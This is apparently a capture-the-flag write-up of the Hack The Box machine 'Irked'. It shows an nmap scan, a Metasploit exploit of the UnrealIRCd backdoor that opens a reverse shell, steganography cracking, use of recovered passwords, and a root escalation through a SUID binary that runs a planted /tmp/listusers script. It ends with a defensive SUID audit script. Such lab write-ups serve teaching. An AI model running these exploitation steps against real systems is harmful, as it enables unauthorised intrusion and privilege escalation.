Irked

Irked Linux · Easy - Adventure mode

🔭 Reconnaissance:

┌──(pmartinezr㉿kali)-[~/htb/irked]
└─$ nmap -p- -Pn -sSVC  10.129.32.44
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-03 19:04 CET
Nmap scan report for 10.129.32.44
Host is up (0.057s latency).
Not shown: 65528 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          38806/udp   status
|   100024  1          44948/udp6  status
|   100024  1          48656/tcp   status
|_  100024  1          59076/tcp6  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
48656/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.92 seconds

CVE-2010-2075

💣 Preparation:

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit
[*] Started reverse TCP double handler on 10.10.14.110:4444
[*] 10.129.32.44:6697 - Connected to 10.129.32.44:6697...
:irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.129.32.44:6697 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo MQNOvyvaDhkk6qee;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "MQNOvyvaDhkk6qee\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.10.14.110:4444 -> 10.129.32.44:57077) at 2026-01-03 19:35:26 +0100
whoami
ircd

👽 Actions:

ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

We discover a password, and the note with it indicates that steganography is in use; the image irked.jpg is quite suspicious.

irked.jpg

┌──(pmartinezr㉿kali)-[~/htb/irked]
└─$ echo "UPupDOWNdownLRlrBAbaSSss" > dic    

┌──(pmartinezr㉿kali)-[~/htb/irked]
└─$ stegcracker irked.jpg dic 
StegCracker 2.1.0 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2026 - Luke Paris (Paradoxis)

StegCracker has been retired following the release of StegSeek, which 
will blast through the rockyou.txt wordlist within 1.9 second as opposed 
to StegCracker which takes ~5 hours.

StegSeek can be found at: https://github.com/RickdeJager/stegseek

Counting lines in wordlist..
Attacking file 'irked.jpg' with wordlist 'dic'..
Successfully cracked file with password: UPupDOWNdownLRlrBAbaSSss
Tried 1 passwords
Your file has been written to: irked.jpg.out
UPupDOWNdownLRlrBAbaSSss

┌──(pmartinezr㉿kali)-[~/htb/irked]
└─$ cat irked.jpg.out
Kab6h+m+bbp2J:HG

Using stegcracker I can extract a second password.

ircd@irked:/home/djmardov/Documents$ su - djmardov
su - djmardov
Password: Kab6h+m+bbp2J:HG

This password lets us log in as djmardov.

djmardov@irked:~$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount
djmardov@irked:~$ /usr/bin/viewuser
/usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2026-01-03 12:26 (:0)
sh: 1: /tmp/listusers: not found

We find a binary that points to a missing .sh file.

djmardov@irked:~$ touch /tmp/listusers
touch /tmp/listusers
djmardov@irked:~$ cd /tmp/listusers
cd /tmp/listusers
-su: cd: /tmp/listusers: Not a directory
djmardov@irked:~$ cd /tmp
cd /tmp
djmardov@irked:/tmp$ echo "bash -p" > listusers
echo "bash -p" > listusers
djmardov@irked:/tmp$ chmod +x listusers
chmod +x listusers
djmardov@irked:/tmp$ /usr/bin/viewuser
/usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2026-01-03 12:26 (:0)
root@irked:~# cat user.txt
cat user.txt
6d77cff4b4739f43b091ea936647ddc3
root@irked:~# cat /root/root.txt
cat /root/root.txt
409b2d91fdf3b5016fdd847c331e517f

Privilege escalation becomes easy if we are the ones who can write what the file /tmp/listusers contains.
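An audit a defender could run for this class of flaw, as an added example that is not part of the original post: it lists SUID binaries that embed a path under a world-writable directory, the pattern that made /usr/bin/viewuser exploitable here. The function names and the directory list are assumptions of this example.

```shell
#!/bin/sh
# Added example: audit SUID binaries for hard-coded paths in world-writable
# directories (the /usr/bin/viewuser -> /tmp/listusers pattern in this post).
# Function names and the directory list are assumptions of this example.

# Print every distinct path under /tmp, /var/tmp or /dev/shm embedded in file $1.
risky_paths() {
    # Turn non-printable bytes into newlines (a minimal `strings`), then match.
    LC_ALL=C tr -c '[:print:]' '\n' 2>/dev/null < "$1" |
        grep -oE '/(tmp|var/tmp|dev/shm)/[A-Za-z0-9_.-]+' | sort -u
}

# Scan tree $1 (default /) and print "binary -> path [exists|missing]".
audit_suid() {
    # -perm -4000 selects the same files as the post's `-perm -u=s`.
    find "${1:-/}" -xdev -perm -4000 -type f 2>/dev/null |
    while IFS= read -r bin; do
        risky_paths "$bin" | while IFS= read -r path; do
            # "missing" means any local user can create the referenced file.
            if [ -e "$path" ]; then state=exists; else state=missing; fi
            printf '%s -> %s [%s]\n' "$bin" "$path" "$state"
        done
    done
}

# Run only when a directory is given, e.g.  sh audit.sh /usr/bin
if [ "$#" -gt 0 ]; then audit_suid "$1"; fi
```

Any binary it reports should either drop privileges before invoking the helper or reference it from a root-owned directory that other users cannot write to.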

To write this post I relied on a tool I built myself. Want to contribute? 🪲DarkReport

This post is licensed under CC BY 4.0 by the author.